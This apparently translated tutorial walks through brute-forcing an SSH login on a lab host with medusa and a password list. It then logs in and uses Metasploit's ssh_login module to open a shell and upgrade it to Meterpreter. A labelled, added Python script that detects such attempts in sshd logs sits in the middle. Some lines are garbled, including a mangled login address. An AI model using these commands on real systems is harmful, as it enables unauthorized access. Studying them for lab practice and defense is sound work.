6-5 Vulnerability exploitation: SSH weak password cracking and utilization
2022-07-04 04:42:00 【Mountain Rabbit 1】
After cracking the password and obtaining the corresponding user name, you can log in with an SSH client. Once logged in, you have a shell, and in that shell you can execute commands and carry out many operations.
Medusa SSH weak password cracking
When setting up the SSH service, an administrator may choose a user name and password that are easy to guess (a weak password) so that they are easy to remember. A tester can then use a password tool to brute-force the weak password, or to crack the user name and password at the same time. Once an easily guessed user name and password have been found, they can be used to log in to the system over SSH.
Weak password cracking bears out the saying that flies don't bite seamless eggs: because we set a weak password, it is likely to be cracked. A choice made for our own convenience creates a defect in the system, which is very inappropriate.
The following shows how to use medusa to crack the user name and password of a specified SSH service.
medusa -h 192.168.1.100 -u msfadmin -p msfadmin -M ssh
-M specifies the service to crack. If success appears in the output, the crack succeeded; if it does not, the dictionary does not contain a user name and password combination that can log in to the system.
First, use ping to check the target server.
ping 192.168.1.100
medusa
// View help information
medusa -d
-d lists the modules (protocols) that medusa knows. When naming a module for cracking, drop the .mod suffix; ssh on its own is enough.
medusa -h 192.168.1.100 -u msfadmin -P /root/Desktop/pass.txt -M ssh
This time, each password in the file is tried in turn to see whether it matches the given user name.
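From the defender's side, a dictionary run like the one above appears in the target's sshd log as a burst of failed password attempts from one source, possibly ending in a success. The following is an added example, not part of the original post, that flags such sources; the log lines, the client addresses 192.168.1.50 and 192.168.1.77, and the threshold are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed sample sshd log (not from the original post); 192.168.1.50 and
# 192.168.1.77 are made-up client addresses, msfadmin is the page's account.
SAMPLE_LOG = """\
Jul  4 04:40:01 target sshd[2101]: Failed password for msfadmin from 192.168.1.50 port 40112 ssh2
Jul  4 04:40:02 target sshd[2103]: Failed password for msfadmin from 192.168.1.50 port 40114 ssh2
Jul  4 04:40:03 target sshd[2105]: Failed password for msfadmin from 192.168.1.50 port 40116 ssh2
Jul  4 04:40:04 target sshd[2107]: Failed password for invalid user admin from 192.168.1.50 port 40118 ssh2
Jul  4 04:40:05 target sshd[2109]: Failed password for msfadmin from 192.168.1.50 port 40120 ssh2
Jul  4 04:40:06 target sshd[2111]: Accepted password for msfadmin from 192.168.1.50 port 40122 ssh2
Jul  4 09:15:10 target sshd[3001]: Failed password for alice from 192.168.1.77 port 51000 ssh2
Jul  4 09:15:20 target sshd[3003]: Accepted password for alice from 192.168.1.77 port 51002 ssh2
"""

# OpenSSH logs "Failed password for [invalid user ]NAME from IP port N ssh2".
LINE_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def analyze(log_text, threshold=5):
    """Flag source IPs with >= threshold failed logins, and any account they
    then logged in to successfully (a likely guessed password)."""
    failures = defaultdict(int)
    findings = {}
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        ip, user = m["ip"], m["user"]
        if m["result"] == "Failed":
            failures[ip] += 1
            if failures[ip] >= threshold:
                findings.setdefault(ip, {"failures": 0, "compromised": []})
        elif ip in findings and user not in findings[ip]["compromised"]:
            # Success from a source already past the threshold.
            findings[ip]["compromised"].append(user)
    for ip, info in findings.items():
        info["failures"] = failures[ip]
    return findings

if __name__ == "__main__":
    for ip, info in analyze(SAMPLE_LOG).items():
        print(ip, info)
```

This sketch counts over the whole input; a production rule would also bound the failures to a time window and feed a blocker such as fail2ban.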
SSH command-line client login
Use an SSH client to log in to the SSH service and operate the system. When there is no graphical interface, we rely entirely on the command line, or on Linux's built-in tools, which lets us complete the work more efficiently.
Linux systems generally include an SSH client for logging in to an SSH server.
Use ssh user-name@IP-address, then enter the password when prompted.
The default port is 22, so there is no need to specify it. If the SSH service uses another port, specify the port number with -p.
ssh [email protected]
msfadmin
id
ifconfig
After logging in, you can execute commands; this was simply a login through the SSH service.
Using Metasploit SSH login to bounce back a shell
Metasploit can perform the SSH login (logging in automatically according to the cracking result) and provide the corresponding Bash shell connection.
medusa only cracks the password, whereas metasploit also returns the resulting session so that we can execute commands. It combines what medusa and the SSH client do.
msfconsole
// Metasploit's command-line console
use auxiliary/scanner/ssh/ssh_login
show options
set rhosts 192.168.1.100
set username msfadmin
show options
set password msfadmin
show options
run
sessions -l
sessions -i 1
id
ifconfig
Using Metasploit to obtain a Meterpreter shell
Using the Bash shell already obtained, inject the Metasploit Meterpreter payload to obtain a more powerful shell.
sessions -u 1
// Pass the session id; the corresponding Meterpreter payload is injected
sessions -l
// Use sessions -l to view the sessions
sessions -i 3
// Connect using the id of the corresponding payload session
id
pwd